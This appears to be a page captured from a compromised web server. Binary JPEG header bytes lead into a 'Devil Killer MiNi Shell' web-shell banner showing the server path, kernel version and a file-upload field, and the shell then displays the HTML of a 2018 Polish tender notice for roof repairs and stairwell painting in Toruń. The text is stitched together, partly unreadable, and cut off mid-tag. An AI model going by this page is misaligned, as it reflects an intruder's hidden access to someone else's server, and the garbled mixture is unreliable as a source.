JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180808/601935-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 601935-N-2018 z dnia 2018-08-08 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Toruńskie Towarzystwo Budownictwa Społecznego Sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Remont pokrycia dachowego segmenty A,B,C,D,E,F,G,H oraz malowanie 10 klatek schodowych z wiatrołapami w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część I : Remont pokrycia dachowego segmenty F,G,H w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część II : Remont pokrycia dachowego segmenty A,B,C,D,E w budynku mieszkalnym przy ul. Kręta 109/111. Część III : Malowanie 2 klatek schodowych z wiatrołapami w segmencie E Część IV : Malowanie 8 klatek schodowych z wiatrołapami w segmentach A,B,C,D,F,G,H. Część V : Białkowanie pomieszczeń piwnicznych: komunikacji, pralni i suszarni</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Toruńskie Towarzystwo Budownictwa Społecznego Sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">87048505000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Watzenrodego </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">17</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">87-100 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Toruń</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">kujawsko-pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">56 653-81-10, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">l.wajs@ttbs.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">566 528 288</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ttbs.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.ttbs.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.ttbs.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy złożyć w siedzibie Zamawiającego w Toruniu przy ul. Watzenrodego 17, w sekretariacie, do dnia 24 sierpnia 2018r. do godz. 9:00.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Remont pokrycia dachowego segmenty A,B,C,D,E,F,G,H oraz malowanie 10 klatek schodowych z wiatrołapami w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część I : Remont pokrycia dachowego segmenty F,G,H w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część II : Remont pokrycia dachowego segmenty A,B,C,D,E w budynku mieszkalnym przy ul. Kręta 109/111. Część III : Malowanie 2 klatek schodowych z wiatrołapami w segmencie E Część IV : Malowanie 8 klatek schodowych z wiatrołapami w segmentach A,B,C,D,F,G,H. Część V : Białkowanie pomieszczeń piwnicznych: komunikacji, pralni i suszarni</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">5</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest:Remont pokrycia dachowego segmenty A,B,C,D,E,F,G,H oraz malowanie 10 klatek schodowych z wiatrołapami w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część I : Remont pokrycia dachowego segmenty F,G,H w budynku mieszkalnym przy ul. Kręta 109/111 w Toruniu. Część II : Remont pokrycia dachowego segmenty A,B,C,D,E w budynku mieszkalnym przy ul. Kręta 109/111. Część III : Malowanie 2 klatek schodowych z wiatrołapami w segmencie E Część IV :Malowanie 8 klatek schodowych z wiatrołapami w segmentach A,B,C,D,F,G,H. Część V : Białkowanie pomieszczeń piwnicznych: komunikacji, pralni i suszarni.2.	Przedmiotem zamówienia dla Części I jest: Remont pokrycia dachowego segmenty F,G,H 2.1.Usunięcie gontów papowych z mansard o pow. ok. 280 m2 2.2.Oczyszczenie z glonów i innych zanieczyszczeń istniejącego pokrycia z papy termozgrzewalnej o pow. ok. 155.46 m22.3.Wymiana narożnych słupków instalacji odgromowej na systemowe z uszczelką gumową (np. typu Farmer) 30 szt. wraz z dokładnym uszczelnieniem mocowań 2.4.Zaślepienie otworów w deskowaniu dachu po usuniętych słupkach instalacji odgromowej 30 miejsc2.5.Przybicie warstwy papy zgrzewalnej podkładowej na mansardach ok. 280 m2 2.6.Przybicie gontów papowych na mansardach (kolor i wzór uzgodnić z Zamawiającym) o pow. ok. 280 m22.7.Ułożenie warstwy papy termozgrzewalnej modyfikowanej na SBS wierzchniego krycia na dachu na pow. ok. 777.30 m22.8.Nowo klejoną warstwę papy termozgrzewalnej wywinąć na kominach do wysokości 0,5 m2.9.Umocowanie wywiniętej papy ponad istniejącą blacharkę (kominy) za pomocą paska blachy i uszczelnienie uszczelniaczem dekarskim ok. 55.20 mb 2.10.Wyklejenie papą termozgrzewalną obróbek blacharskich 14 daszków lukarn o pow. ok. 28,00 m22.11.Ułożenie warstwy wełny mineralnej gr 5 cm na stropie i wieńcach nad mieszkaniem nr 69 o pow. ok. 50 m2 2.12.Wymiana rur spustowych wraz z kolanami na 3 wiatrołapach fi 75, 9 mb.2.13.Demontaż starej i montaż nowej nakrywy wejścia dachowego wraz z obróbkami 1 szt.2.14.Obróbki blacharskie wiatrownic, ogniomurów, koszy paskami blachy powlekanej o szer. w rozwinięciu ponad 30 cm ok. 21 m22.15.Wymiana rynien fi 180 wraz z rynhakami 75 mb2.16.Wymiana rur spustowych fi 150, 20 mb. wraz z kolanami 6 szt.2.17.Wymiana czyszczaków na rurach spustowych szt. 2 2.18.Ustawienie i rozebranie rusztowań ok. 900,00 m22.19.Uporządkowanie terenu 2.20.Odtworzenie zieleni zniszczonej w trakcie prowadzenia robót 2.21. Wywiezienie i utylizacja materiałów pochodzących z rozbiórki 2a. Przedmiotem zamówienia dla Części II jest: Remont pokrycia dachowego segmenty A,B,C,D,E,2a.1.Usunięcie gontów papowych z mansard o pow. ok. 773,99 m2 2a.2.Oczyszczenie z glonów i innych zanieczyszczeń istniejącego pokrycia z papy termozgrzewalnej o pow. ok. 279,58 m22a.3. .Wymiana narożnych słupków instalacji odgromowej na systemowe z uszczelką gumową (np. typu Farmer) 130 szt. wraz z dokładnym uszczelnieniem mocowań 2a.4.Zaślepienie otworów w deskowaniu dachu po usuniętych słupkach instalacji odgromowej 130 miejsc2a.5.Przybicie warstwy papy zgrzewalnej podkładowej na mansardach na pow. ok. 773,99 m2 2a.6.Przybicie gontów papowych na mansardach (kolor i wzór uzgodnić z Zamawiającym) na pow. ok. 773.30 m22a.7.Ułożenie warstwy papy termozgrzewalnej modyfikowanej na SBS wierzchniego krycia na dachu o pow. ok. 1397,90 m22a.8.Nowo klejoną warstwę papy termozgrzewalnej wywinąć na kominach do wysokości 0,5 m2a.9.Umocowanie wywiniętej papy ponad istniejącą blacharkę (kominy) za pomocą paska blachy i uszczelnienie uszczelniaczem dekarskim ok. 115.92 mb 2a.10.Wyklejenie papą termozgrzewalną obróbek blacharskich 14 daszków lukarn ok. 28,00 m2 2a.11.Wymiana rur spustowych wraz z kolanami na 7 wiatrołapach fi 75, 21 mb 2a.12.Demontaż starej i montaż nowej nakrywy wejścia dachowego wraz z obróbkami 1 szt2a.13.Obróbki blacharskie wiatrownic, ogniomurów, koszy paskami blachy powlekanej o szer. w rozwinięciu ponad 30 cm ok. 49 m22a.14.Wymiana rynien fi 180 wraz z rynhakami 100 mb2a.15.Wymiana rur spustowych fi 150, 50 mb wraz z kolanami 15 szt.2a.17.Montaż czyszczaków na rurach spustowych 5 szt.2a.18.Ustawienie i rozebranie rusztowań ok. 2 264.50 m22a.19.Uporządkowanie terenu 2a.20.Odtworzenie zieleni zniszczonej w trakcie prowadzenia robót2a.21.Wywiezienie i utylizacja odpadów 2b.	Przedmiotem zamówienia dla Części III jest: Malowanie 2 klatek schodowych z wiatrołapami segment E (2 szt.)2b.22.Oczyszczenie i zmycie starego podłoża o pow. ok. 564,65 m22b.23.Zabezpieczenie podłóg i okien folią o pow. ok. 190.28 m22b.24.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 320.61 m22b.25.Wymiana zagrzybionych płyt gipsowo-kartonowych o pow. 9,36 m22b.26.Wymiana zamokniętej wełny mineralnej gr 15 cm 9,36 m22b.27. Likwidacja zacieków o pow. ok. 10 m22b.28.Zagruntowanie ścian środkiem gruntującym o pow. 564,65 m22b.29.Malowanie ścian lamperii farbami zmywalnymi odpornymi na zabrudzenia i ścieranie (kolor uzgodnić z Zamawiającym) o pow. 244,04 m22b.30.Malowanie ścian i sufitów ponad lamperiami farbami emulsyjnymi o pow. 320,61 m22b.31.Malowanie podstopnic schodów, policzków z wywinięciem 10 cm od spodu biegu schodowego farbą do betonów o pow. 36,72 m22b.32.Malowanie stolarki drzwiowej, szafek instalacyjnych farbą ekologiczną o pow. 36 m22b.33.Malowanie grzejników stalowych o pow. 4,00 m22b.34.Malowanie rur o średnicy do 50 mm o dł. 36 mb2b.35.Malowanie balustrad farbą olejną o pow. 109,12 m22b.36.Wymiana uszczelnień pod parapetem okien klatek schodowych2b.37.Codzienne utrzymywanie w czystości schodów i pochwytów balustrad2b.38.Dokładne umycie klatek schodowych, okien i drzwi po zakończeniu robót remontowych 2b.39.Wywiezienie i utylizacja odpadówWiatrołapy (2 szt.)2b.40..Oczyszczenie i zmycie starego podłoża o pow. 47,32 m22b.41.Zabezpieczenie podłóg i drzwi folią o pow. 13,40 m22b.42.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 27,30 m22b.43.Zagruntowanie ścian środkiem gruntującym o pow. 47,32 m22b.44.Wykonanie warstwy podkładowej pod tynk strukturalny o pow. 27,30 m2 2b.45.Nałożenie tynku strukturalnego (baranka) do wysokości lamperii o pow. 27,30m22b.46.Malowanie lamperii farbami zmywalnymi odpornymi na zabrudzenia o pow. 27,30 m22b.47.Malowanie skrzynek energetycznych o pow. 1,00 m2 2c. Przedmiotem zamówienia dla Części IV jest: Malowanie 8 klatek schodowych z wiatrołapami segmenty A,B,C,D,F,G, H.2c.1. Oczyszczenie i zmycie starego podłoża o pow. ok. 2258,60 m22c.2. Zabezpieczenie podłóg i okien folią o pow. ok. 761,12 m22c.3. Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 1282,44 m22c.4. Wymiana zagrzybionych płyt gipsowo-kartonowych o pow. 9,36 m22c.5. Wymiana zamokniętej wełny mineralnej gr. 15 cm o pow. 9,36 m22c.6 .Zagruntowanie ścian środkiem gruntującym o pow. 2258,60 m2 2c.7.Malowanie ścian lamperii farbami zmywalnymi odpornymi na zabrudzenia i ścieranie (kolor uzgodnić z Zamawiającym)o pow. 976,16 m22c.8.Malowanie ścian i sufitów ponad lamperiami farbami emulsyjnymi o pow. 1282,44 m22c.9.Malowanie podstopnic schodów, policzków z wywinięciem 10 cm od spodu biegu schodowego farbą do betonów o pow. 146,88 m22c.10.Malowanie stolarki drzwiowej, szafek instalacyjnych farbą ekologiczną o pow. 144 m22c.11.Malowanie grzejników stalowych o pow. 16,00 m22c.12.Malowanie rur o średnicy do 50 mm o dł. 144 mb2c.13.Malowanie balustrad farbą olejną o pow. 436,48 m22c.14.Wymiana uszczelnień pod parapetami okien klatek schodowych2c.15.Codzienne utrzymywanie w czystości schodów i pochwytów balustrad2c.16.Umycie klatek schodowych, okien i drzwi po zakończeniu robót remontowych 2c.17.Wywiezienie i utylizacja odpadówWiatrołapy (8 szt.)4.38.Oczyszczenie i zmycie starego podłoża o pow. 189,18 m24.39.Zabezpieczenie podłóg i drzwi folią o pow. 52,56 m24.40.Wygładzenie nierówności poprzez szpachlowanie ścian (lamperie) o pow. 109,20 m24.41.Zagruntowanie ścian środkiem gruntującym o pow. 189,18 m24.42.Wykonanie warstwy podkładowej pod tynk strukturalny o pow. 109,20 m2 4.43.Nałożenie tynku strukturalnego (baranka) do wysokości lamperii o pow. 109,20m24.44.Malowanie lamperii farbami zmywalnymi odpornymi na zabrudzenia o pow. 10,20 m24.45.Malowanie skrzynek energetycznych o pow. 4,00 m2 2d. Przedmiotem zamówienia dla Części V jest: Malowanie pomieszczeń piwnicznych: komunikacji, pralni i suszarni.2d.1.1. Zabezpieczenie podłóg i okien folią o pow. ok. 645,72 m22d.1.2. Zmycie ścian i sufitów o pow. ok. 1 663,21 m2 2d.1.3. Malowanie ścian i sufitów farbą do pom. piwnicznych ( odporną na wilgoć) o pow. ok. 1 663,21 m22d.1.4. Pomalowanie drzwi wewnętrznych w pomieszczeniach: komunikacji, pralni i suszarni ilość 22 szt. 2d.1.5. Umycie posadzek okien po robotach malarskich2d.1.6. Wywiezienie i utylizacja odpadów po robotach malarskich. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45310000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">99999998,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span 